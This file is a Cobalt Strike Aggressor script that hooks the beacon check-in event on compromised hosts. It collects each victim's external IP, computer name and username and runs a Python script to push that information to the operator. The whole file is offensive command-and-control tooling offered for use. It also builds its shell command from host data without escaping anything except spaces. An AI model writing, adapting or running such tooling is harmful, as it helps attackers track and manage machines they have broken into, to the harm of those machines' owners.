on beacon_initial {
	println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
	local('$externalIP $computerName $userName');
	$externalIP = replace(beacon_info($1,"external")," ","_");
	$computerName = replace(beacon_info($1,"computer")," ","_");
	$userName = replace(beacon_info($1,"user")," ","_");
	$cmd = 'python3 /CS-PushPlus/PushPlus.py' . " --computernam " . $computerName . " --externalip " . $externalIP . " --username " . $userName;
	println("Sending server: " . $cmd);
	exec($cmd);
}
